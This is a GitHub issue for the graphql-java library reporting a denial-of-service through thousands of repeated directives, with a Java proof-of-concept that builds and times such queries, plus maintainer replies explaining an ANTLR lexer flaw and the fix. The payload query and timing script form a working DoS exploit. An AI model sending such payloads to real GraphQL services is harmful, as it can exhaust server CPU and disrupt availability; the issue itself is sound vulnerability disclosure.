Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Denial of Service via Directive overloading #2888

Closed
act1on3 opened this issue Jul 18, 2022 · 6 comments
Closed

Denial of Service via Directive overloading #2888

act1on3 opened this issue Jul 18, 2022 · 6 comments
Milestone

Comments

@act1on3
Copy link
Contributor

act1on3 commented Jul 18, 2022

Hello team,
I've discovered that graphql-java is affected by Denial of Service via Directives overloading by default, and there is no way to configure it securely (afaik).
Query example:

query {__typename @aa}

I get errors by implemented security mechanisms, but these mechanisms don't help in this case:

MaxQueryDepthInstrumentation and MaxQueryComplexityInstrumentation don't solve the issue as well.

Query execution time increases by adding more directives:

5000 directives: 445 ms
10000 directives: 732 ms
15000 directives: 1164 ms
20000 directives: 1671 ms
25000 directives: 2159 ms
30000 directives: 2661 ms
35000 directives: 3171 ms
40000 directives: 3687 ms
45000 directives: 4224 ms
50000 directives: 4711 ms
55000 directives: 5227 ms
60000 directives: 5749 ms
65000 directives: 6297 ms
70000 directives: 6788 ms

The code snippet for testing:

import graphql.ExecutionInput;
import graphql.ExecutionResult;
import graphql.GraphQL;
import graphql.schema.GraphQLSchema;
import graphql.schema.StaticDataFetcher;
import graphql.schema.idl.RuntimeWiring;
import graphql.schema.idl.SchemaGenerator;
import graphql.schema.idl.SchemaParser;
import graphql.schema.idl.TypeDefinitionRegistry;

import static graphql.schema.idl.RuntimeWiring.newRuntimeWiring;

public class HelloWorld {

    static Integer STEP = 5000;
    static Integer CHECKS_AMOUNT = 15;

    public static void main(String[] args) {
        String schema = "type Query{hello: String}";

        SchemaParser schemaParser = new SchemaParser();
        TypeDefinitionRegistry typeDefinitionRegistry = schemaParser.parse(schema);

        RuntimeWiring runtimeWiring = newRuntimeWiring()
                .type("Query", builder -> builder.dataFetcher("hello", new StaticDataFetcher("world")))
                .build();

        SchemaGenerator schemaGenerator = new SchemaGenerator();
        GraphQLSchema graphQLSchema = schemaGenerator.makeExecutableSchema(typeDefinitionRegistry, runtimeWiring);

        GraphQL build = GraphQL.newGraphQL(graphQLSchema).build();

        String payload = "@aa";

        for (int i = 1; i < CHECKS_AMOUNT; i++) {

            String query = "query {__typename " + payload.repeat(i * STEP) + "}";
            ExecutionInput executionInput = ExecutionInput.newExecutionInput().query(query).build();

            long startTime = System.nanoTime();

            ExecutionResult executionResult = build.execute(executionInput);

            long endTime = System.nanoTime();
            long duration = (endTime - startTime);

            System.out.println(String.format("%d directives: %d ms", i* STEP, duration / 1000000));
        }
    }
}
@bbakerman
Copy link
Member

#2549 should help out of the box as its expressely for that attack

The default number of tokens is 15000. You test above should kicked out at 15000 tokens.

Hmm perhaps this is because you are appending them together as @aa@aa@aaa wich is valid but perhaps the ANTLR token count does not register them as tokens and hence it never reaches the count.

We will look into this more.

Thanks for reporting

@bbakerman
Copy link
Member

Thanks very much for reporting this problem. We did discover another problem in the ANTLR lexer that nullified out previous attempts to limit how many tokens get parsed.

the ANTLR lexer is by design greedy and wants to get as many characters as it can before presenting them back to the parser. Certain grammar (like @lol@lol directives all together) mean that the lexer greedily races ahead and never returns to the parser (even though it has discovered N grammar elements).

The end result is that even thought the parser had code to limit how many tokens it would process, the underlying lexer was driving CPU work that ended up in DOS territory before a callback to the parser could cause the limits to be applied.

See #2892

@bbakerman
Copy link
Member

I have asked in antlr/antlr4#3796 for more ANLTR info here so we can better at this

@act1on3
Copy link
Contributor Author

act1on3 commented Jul 26, 2022

Hi @bbakerman,
That's good news that the reported issue is helpful. Thanks for investigating it carefully.

@dondonz dondonz added this to the 19.0 milestone Jul 26, 2022
@dondonz
Copy link
Member

dondonz commented Jul 26, 2022

Closed by #2892

@dondonz dondonz closed this as completed Jul 26, 2022
@seanf
Copy link

seanf commented Sep 14, 2022

Also closed by #2902 and #2897 (backports). Thanks @bbakerman !

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

4 participants